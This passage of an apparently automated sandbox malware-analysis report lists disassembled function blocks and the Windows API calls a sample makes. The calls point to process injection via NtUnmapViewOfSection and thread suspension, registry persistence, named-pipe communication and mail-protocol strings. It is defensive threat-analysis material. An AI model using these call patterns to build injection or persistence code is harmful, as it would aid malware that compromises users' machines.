  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
